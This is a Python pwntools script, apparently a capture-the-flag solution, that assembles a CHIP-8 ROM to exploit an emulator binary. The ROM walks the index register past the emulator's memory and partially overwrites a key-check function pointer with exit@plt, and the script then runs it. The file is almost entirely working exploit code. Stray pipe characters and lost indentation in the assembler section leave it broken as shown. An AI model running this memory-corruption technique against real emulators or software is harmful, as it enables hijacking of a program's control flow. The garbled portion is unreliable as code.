from pwn import * | |
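def set_reg(reg, value):
    """Encode CHIP-8 ``6XNN`` (``Vx = NN``): load the byte *value* into register *reg*.

    Args:
        reg: register index, 0..0xF (one nibble).
        value: immediate byte, 0..0xFF.

    Returns:
        The 16-bit opcode as an int.

    Raises:
        ValueError: if either operand does not fit its field. Without this
            check an oversized operand silently bleeds into the neighbouring
            field and a different instruction is emitted.
    """
    if not 0 <= reg <= 0xF:
        raise ValueError(f"register index out of range: {reg:#x}")
    if not 0 <= value <= 0xFF:
        raise ValueError(f"immediate byte out of range: {value:#x}")
    return 0x6000 | (reg << 8) | value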
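def add_i(reg):
    """Encode CHIP-8 ``FX1E`` (``I += Vx``): add register *reg* to the index register.

    Args:
        reg: register index, 0..0xF (one nibble).

    Returns:
        The 16-bit opcode as an int.

    Raises:
        ValueError: if *reg* does not fit in a nibble (it would otherwise
            overwrite the ``F`` opcode prefix).
    """
    if not 0 <= reg <= 0xF:
        raise ValueError(f"register index out of range: {reg:#x}")
    return 0xF01E | (reg << 8)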
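def add_reg_byte(reg, byte):
    """Encode CHIP-8 ``7XNN`` (``Vx += NN``): add an immediate byte to register *reg*.

    Args:
        reg: register index, 0..0xF (one nibble).
        byte: immediate byte, 0..0xFF.

    Returns:
        The 16-bit opcode as an int.

    Raises:
        ValueError: if either operand does not fit its field.
    """
    if not 0 <= reg <= 0xF:
        raise ValueError(f"register index out of range: {reg:#x}")
    if not 0 <= byte <= 0xFF:
        raise ValueError(f"immediate byte out of range: {byte:#x}")
    return 0x7000 | (reg << 8) | byte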
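def jump(addr):
    """Encode CHIP-8 ``1NNN`` (jump to *addr*), resolved lazily against a symbol table.

    Args:
        addr: either a 12-bit absolute address (int) or a label name (str)
            that the program list defines as a bare string entry.

    Returns:
        A callable ``resolve(symbols) -> int``. The assembler calls it after
        every label has been assigned an address; a label is looked up in
        *symbols*, an int is used as-is.

    The returned callable raises:
        KeyError: if *addr* is a label that *symbols* does not contain. The
            original fell through to ``0x1000 | "label"`` and died with an
            opaque TypeError.
        ValueError: if the resolved address does not fit in 12 bits, which
            would corrupt the ``1`` opcode nibble.
    """
    def resolve(symbols):
        # Same lookup as before: labels resolve through the table, ints pass through.
        target = symbols.get(addr, addr)
        if isinstance(target, str):
            raise KeyError(f"unresolved jump label: {addr!r}")
        if not 0 <= target <= 0xFFF:
            raise ValueError(f"jump target out of 12-bit range: {target:#x}")
        return 0x1000 | target
    return resolve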
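def store_regs_at_i(lastreg):
    """Encode CHIP-8 ``FX55``: store ``V0..Vx`` to memory starting at ``I``.

    Args:
        lastreg: index of the last register to store, 0..0xF (one nibble).

    Returns:
        The 16-bit opcode as an int.

    Raises:
        ValueError: if *lastreg* does not fit in a nibble.
    """
    if not 0 <= lastreg <= 0xF:
        raise ValueError(f"register index out of range: {lastreg:#x}")
    return 0xF055 | (lastreg << 8)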
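def skip_if_reg_equals_byte(reg, byte):
    """Encode CHIP-8 ``3XNN``: skip the next instruction if ``Vx == NN``.

    Args:
        reg: register index, 0..0xF (one nibble).
        byte: comparison byte, 0..0xFF.

    Returns:
        The 16-bit opcode as an int.

    Raises:
        ValueError: if either operand does not fit its field.
    """
    if not 0 <= reg <= 0xF:
        raise ValueError(f"register index out of range: {reg:#x}")
    if not 0 <= byte <= 0xFF:
        raise ValueError(f"comparison byte out of range: {byte:#x}")
    return 0x3000 | (reg << 8) | byte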
elf = ELF("./chip8")

# Target value for the partial overwrite below: the low 16 bits of exit@plt.
exit_plt = elf.plt.exit

# Program listing. Ints are ready opcodes, bare strings are labels that the
# assembler turns into addresses, and callables (see jump()) are resolved once
# the label table is complete.
program = [
    # Walk I up to 0x3040 (= 193 * 64): add Vc = 193 to I sixty-four times,
    # counting the iterations in Ve. This relies on the emulator letting I run
    # past its own address space (inferred from the exploit, not verified here);
    # a bounds check on I in the emulator is the fix for the underlying bug.
    set_reg(0xC, 193),
    "add_i_loop",
    add_i(0xC),                        # I += Vc
    add_reg_byte(0xE, 1),              # Ve += 1
    skip_if_reg_equals_byte(0xE, 64),  # leave the loop once Ve == 64
    jump("add_i_loop"),
    # V0 = low byte, V1 = next byte of exit@plt, in the order FX55 writes them.
    set_reg(0, exit_plt & 0xFF),
    set_reg(1, (exit_plt >> 8) & 0xFF),
    store_regs_at_i(1),                # partial overwrite of the key-check function pointer at I
    set_reg(3, 3),
    0xE39E,                            # EX9E with X = 3: "skip next if key 3 is pressed"
]
# "assemble" the ROM | |
symbols = {} | |
flat_program = [] | |
for thing in program: | |
if type(thing) is str: | |
symbols[thing] = 0x200 + len(flat_program) * 2 | |
else: | |
flat_program.append(thing) | |
rom = b"".join([(x if type(x) is int else x(symbols)).to_bytes(2, "big") for x in flat_program]) | |
log.info(f"Assembled ROM size: {len(rom)}") | |
open("exploit.rom", "wb").write(rom) | |
# Launch the emulator on the freshly written ROM and drain its output until it
# exits. The original carried a commented-out env={"DISPLAY": ":0"} argument,
# presumably for builds that open a window; it is left off here as before.
emulator_cmd = ["./chip8", "exploit.rom"]
p = process(emulator_cmd)
p.recvall()